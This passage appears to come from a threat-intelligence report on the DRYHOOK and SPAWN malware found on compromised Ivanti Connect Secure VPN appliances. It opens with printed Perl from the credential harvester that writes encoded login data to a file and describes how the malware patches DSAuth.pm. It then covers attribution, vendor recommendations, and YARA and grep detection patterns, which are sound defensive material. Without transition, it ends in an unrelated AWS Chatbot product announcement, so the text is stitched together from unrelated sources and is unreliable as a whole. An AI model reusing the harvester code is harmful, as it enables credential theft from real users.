print FH encode_base64($dd)."\n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file; if unsuccessful, it remounts the file system as read-write, writes the file, and then remounts the file system as read-only again. Finally, all instances of the cgi-server process are killed so that the modified DSAuth.pm takes effect.
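Based only on the file names and injected identifiers described above, a hypothetical spot check for DRYHOOK activity might look like the following (standard utilities, not report tooling):
# Hypothetical: the harvested-credential drop file named in this report
ls -l /tmp/cmdmmap.kuwMW 2>/dev/null
# Hypothetical: injected globals and RC4 usage should not appear in a clean DSAuth.pm
grep -nE '\$ds_g|cmdmmap\.kuwMW|Crypt::RC4' /home/perl/DSAuth.pm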
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity, including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan. 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families, including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Secure appliances, as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and deploying web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely that additional threat actors will attempt to target Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and contacting Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a compromised device. Note the number of steps reported in the output.
Ivanti also notes that the ICT provides a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if the appliance has been returned to a clean state. The ICT does not scan for malware or other indicators of compromise. Ivanti recommends that customers run the ICT in conjunction with other security monitoring tools, which have detected post-exploitation activity in this campaign.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset of the appliance to ensure any malware is removed, and then placing the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
AWS announces general availability of 20 additional AWS Systems Manager Automation runbook recommendations as contextual action buttons on event notifications in AWS Chatbot. This launch enables customers to run AWS Systems Manager automations from Microsoft Teams and Slack channels to address AWS Security Hub and Amazon ECS-related events.
With this launch, customers can run AWS Systems Manager automations to resolve issues when they receive AWS Security Hub and Amazon ECS event notifications in chat channels. AWS Chatbot displays contextual action buttons on Security Hub and ECS event notifications, and customers can click them to run automations that address the underlying issue. For example, they can run an automation to disable public accessibility of an Amazon RDS database instance, or an automation to troubleshoot why an Amazon ECS task in an Amazon ECS cluster failed to start.
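For teams that prefer the CLI to chat actions, the same kind of remediation can typically be started directly through Systems Manager. The runbook name and parameter values below are illustrative assumptions rather than the specific recommendations surfaced by AWS Chatbot:
# Hypothetical example: start an AWS-managed automation runbook from the CLI
aws ssm start-automation-execution \
  --document-name "AWSConfigRemediation-DisablePublicAccessToRDSInstance" \
  --parameters '{"DbiResourceId":["db-EXAMPLE123"],"AutomationAssumeRole":["arn:aws:iam::111122223333:role/ExampleAutomationRole"]}'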
Get started with AWS Systems Manager Automation runbook recommendations in chat channels by installing the AWS Chatbot apps for Microsoft Teams and Slack. You can use AWS Systems Manager Automation runbook action recommendations at no additional cost. This feature is available in all public AWS Regions where the AWS Chatbot service is offered. To learn more about custom actions in AWS Chatbot, visit the AWS Chatbot documentation or the AWS Chatbot product page.